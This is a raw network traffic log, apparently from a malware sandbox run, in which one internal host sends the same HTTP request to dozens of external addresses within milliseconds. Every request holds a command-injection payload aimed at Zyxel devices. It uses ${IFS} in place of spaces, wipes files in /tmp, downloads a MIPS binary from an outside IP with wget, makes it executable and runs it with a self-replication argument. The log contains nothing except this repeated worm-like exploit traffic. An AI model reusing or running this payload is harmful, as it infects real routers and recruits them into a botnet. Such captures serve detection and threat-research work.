                                      Jan 14, 2024 15:50:46.302165031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4348192.168.2.145993842.152.146.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302227974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4349192.168.2.1440648220.26.241.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302294970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4350192.168.2.143929258.88.223.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302371979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4351192.168.2.1436150204.61.104.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302407026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4352192.168.2.144998242.236.106.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302476883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4353192.168.2.1460126106.170.34.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302516937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4354192.168.2.143563438.80.128.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302556992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4355192.168.2.145489285.80.0.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302602053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4356192.168.2.145377625.104.19.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302648067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4357192.168.2.1438036199.206.11.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302710056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4358192.168.2.144611292.155.182.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302769899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4359192.168.2.1447820192.225.68.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302803040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4360192.168.2.1434558223.115.23.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302879095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4361192.168.2.145674272.14.172.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302927017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4362192.168.2.1460966117.52.10.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.302994013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4363192.168.2.143363860.128.108.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303059101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4364192.168.2.143966271.205.211.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303119898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4365192.168.2.1451146123.147.0.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303160906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4366192.168.2.143655851.37.17.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303196907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4367192.168.2.1454602196.78.146.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303246021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4368192.168.2.1432860179.76.134.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303297043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4369192.168.2.144598817.227.174.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303361893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4370192.168.2.143449274.22.41.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303422928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4371192.168.2.1445256150.119.243.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303478956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4372192.168.2.1445978113.190.69.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303539991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4373192.168.2.1451344139.236.34.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303556919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4374192.168.2.143623675.122.169.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303621054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4375192.168.2.145026072.147.129.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303656101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4376192.168.2.143976646.156.37.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303713083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4377192.168.2.1434320113.198.37.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303776979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4378192.168.2.1448458176.244.218.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303826094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4379192.168.2.1452844148.186.36.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303885937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4380192.168.2.1453238162.20.45.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303919077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4381192.168.2.1440704108.216.129.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.303976059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4382192.168.2.1441426163.132.240.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304027081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4383192.168.2.1444048164.26.86.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304080963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4384192.168.2.1434752154.108.143.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304124117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4385192.168.2.145652013.171.196.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304181099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4386192.168.2.1434784156.94.117.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304260969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4387192.168.2.1442412181.254.8.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304315090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4388192.168.2.1438828142.33.77.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304382086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4389192.168.2.144154023.204.70.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304460049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4390192.168.2.1450694103.29.209.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304514885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4391192.168.2.1442686216.234.186.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304573059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4392192.168.2.1460378180.87.110.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304636955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4393192.168.2.1441806191.35.178.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304675102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4394192.168.2.1459712154.186.229.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304709911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4395192.168.2.1456002112.70.159.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304770947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4396192.168.2.1433712132.208.155.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304830074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4397192.168.2.144737042.102.138.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304886103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4398192.168.2.14363465.244.131.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304924965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4399192.168.2.1438628152.126.236.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.304968119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4400192.168.2.1451136159.77.5.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305032015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4401192.168.2.145238027.96.87.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305090904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4402192.168.2.1448154219.180.108.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305133104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4403192.168.2.1445168191.157.247.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305186033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4404192.168.2.1453756173.39.92.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305236101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4405192.168.2.1451730205.77.148.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305289030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4406192.168.2.1440068142.239.30.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305331945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4407192.168.2.145955058.209.244.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305398941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4408192.168.2.1459276197.221.37.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305454016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4409192.168.2.1436292223.134.87.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305490017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4410192.168.2.144593420.49.2.33443
                                      TimestampBytes transferredDirectionData
